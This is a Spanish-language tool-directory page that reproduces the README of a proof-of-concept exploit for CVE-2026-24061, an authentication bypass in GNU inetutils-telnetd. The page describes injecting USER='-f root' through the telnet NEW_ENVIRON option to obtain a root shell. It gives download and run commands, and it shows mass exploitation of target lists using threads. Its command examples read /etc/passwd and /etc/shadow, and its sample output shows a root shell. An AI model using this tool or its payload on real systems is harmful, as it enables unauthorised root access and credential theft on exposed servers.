Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en GNU inetutils-telnetd que permite a atacantes remotos no autenticados obtener acceso instantáneo a la shell root mediante la explotación maliciosa de la opción telnet NEW_ENVIRON. | Kitploit
Herramientas/GitHubGitHub/sh4den/cve-2026-24061
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónComando y ControlAutenticaciónPapers e InvestigaciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub
6111hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
sh4den/cve-2026-24061

CVE-2026-24061

Proof of Concept: CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en GNU inetutils-telnetd que permite a atacantes remotos no autenticados obtener acceso instantáneo a la shell root mediante la explotación maliciosa de la opción telnet NEW_ENVIRON.

Ver Repositorio

CVE-2026-24061

GNU inetutils-telnetd - Bypass de Autenticación Remota

Una herramienta de investigación de seguridad para explotar CVE-2026-24061, una vulnerabilidad crítica de omisión de autenticación remota en GNU inetutils-telnetd que permite acceso instantáneo a un shell root sin autenticación.


Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Versiones Afectadas
  • Análisis Técnico
  • Requisitos Previos
  • Instalación
  • Uso
  • Referencia de Salida
  • Metodología de Explotación
  • Mitigación y Corrección
  • Indicadores de Compromiso
  • Aviso Legal
  • Referencias
  • Créditos

Resumen de la Vulnerabilidad

CampoValor
Identificador CVECVE-2026-24061
Puntuación CVSS v3.19.8 (Crítico)
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Clasificación CWECWE-88: Neutralización Incorrecta de Delimitadores de Argumentos en un Comando
ProveedorProyecto GNU
Productoinetutils-telnetd
Fecha de Divulgación20 de enero de 2026
Parche DisponiblePor determinar

Resumen Ejecutivo

Existe una vulnerabilidad crítica en GNU inetutils-telnetd hasta la versión 2.7 que permite a atacantes remotos no autenticados eludir completamente la autenticación y obtener acceso inmediato a un shell root. La vulnerabilidad se explota mediante la opción telnet NEW_ENVIRON, inyectando una variable de entorno USER especialmente manipulada con el valor "-f root", que sortea todos los mecanismos de autenticación.

Evaluación del Impacto

  • Confidencialidad: Compromiso total de los datos del sistema
  • Integridad: Control completo del sistema con privilegios root
  • Disponibilidad: Posibilidad de toma completa del sistema o denegación de servicio
  • Alcance: Sin cambios: la explotación afecta solo al servicio telnet vulnerable

Versiones Afectadas

Rango de VersionesEstado
<= 2.7Vulnerable
> 2.7Estado del Parche: Por determinar

Análisis Técnico

Causa Raíz de la Vulnerabilidad

La vulnerabilidad se origina por la validación incorrecta de la variable de entorno USER en el manejador de la opción NEW_ENVIRON de telnetd. Al procesar la opción telnet NEW_ENVIRON, el servicio telnetd no sanitiza el valor de la variable USER antes de pasarlo al proceso de inicio de sesión. Al establecer USER en "-f root", el atacante inyecta argumentos de línea de comandos que fuerzan la autenticación exitosa para el usuario root sin necesidad de credenciales.

Vector de Ataque

  1. El atacante se conecta al servicio telnetd (normalmente puerto 23)
  2. Durante la negociación de opciones telnet, el servidor solicita datos NEW_ENVIRON
  3. El atacante responde con la variable de entorno USER establecida en "-f root"
  4. El argumento malicioso elude las comprobaciones de autenticación
  5. Se concede un shell root instantáneo sin ninguna solicitud de contraseña
  6. Se logra el compromiso total del sistema

Complejidad de Explotación

  • Requisitos Previos: Acceso de red al servicio telnetd objetivo
  • Autenticación: No requerida
  • Interacción del Usuario: Ninguna
  • Complejidad del Ataque: Baja

Requisitos Previos

Requisitos del Sistema

  • Python 3.7 o superior
  • Conectividad de red con la(s) instancia(s) telnetd objetivo
  • Permisos suficientes para ejecutar scripts de Python

Dependencias

Todas las dependencias son parte de la librería estándar de Python:

PaquetePropósito
socketComunicación de red
selectMultiplexación E/S
sysInteracción con el sistema
osInterfaz del sistema operativo
threadingExplotación concurrente de objetivos
datetimeFormato de marcas de tiempo

Instalación

Método 1: Usando Git

# Clonar el repositorio
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Ejecutar el exploit
python3 main.py -u <target_ip>

Método 2: Descarga Directa

# Descargar el exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Hacerlo ejecutable (Linux/macOS)
chmod +x main.py

# Ejecutar el exploit
python3 main.py -u <target_ip>

Método 3: Instalación Manual

# Asegurarse de que Python 3.7+ está instalado
python3 --version

# Descargar y ejecutar
python3 main.py -u <target_ip>

Uso

Interfaz de Línea de Comandos

Uso:
    python3 main.py -u <ip_objetivo> [-p <puerto>] [-usr <usuario>]
    python3 main.py -l <archivo_objetivos> [-p <puerto>] [-usr <usuario>]
    echo "comandos" | python3 main.py -u <ip_objetivo>

Argumentos:
    -u          Dirección IP o nombre de host de un solo objetivo
    -l          Ruta al archivo que contiene IPs objetivo (una por línea)
    -p          Puerto objetivo (por defecto: 23)
    -usr        Usuario para explotar (por defecto: root)

Explotación de un Solo Objetivo

Explotar una instancia telnetd:

# Explotación básica (puerto 23 por defecto, usuario root)
python3 main.py -u 192.168.1.100

# Puerto personalizado
python3 main.py -u 192.168.1.100 -p 2323

# Usuario diferente
python3 main.py -u 192.168.1.100 -usr admin

Modo de Ejecución de Comandos

Ejecutar comandos de forma no interactiva:

# Comando único
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Múltiples comandos
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Comando con redirección de salida
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Explotación Masiva de Objetivos

Explotar múltiples objetivos desde un archivo:

python3 main.py -l objetivos.txt
python3 main.py -l objetivos.txt -p 2323
python3 main.py -l objetivos.txt -usr admin

Formato del Archivo de Objetivos (objetivos.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Notas:

  • Un objetivo por línea
  • Direcciones IP o nombres de host
  • Las líneas vacías se ignoran
  • Los objetivos se explotan simultáneamente usando hilos

Referencia de Salida

Indicadores de Estado

IndicadorColorDescripción
[SUCCESS]VerdeConectado exitosamente al objetivo
[EXPLOIT]VerdePayload de explotación enviado exitosamente
[INFO]AzulMensaje informativo sobre la operación actual
[ERROR]RojoError de conexión, tiempo de espera o error de explotación
[WARNING]AmarilloMensaje de advertencia (no se usa actualmente)

Ejemplo de Salida

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Metodología de Explotación

Proceso de Negociación del Protocolo Telnet

El exploit aprovecha la fase de negociación del protocolo telnet:

Descargar herramienta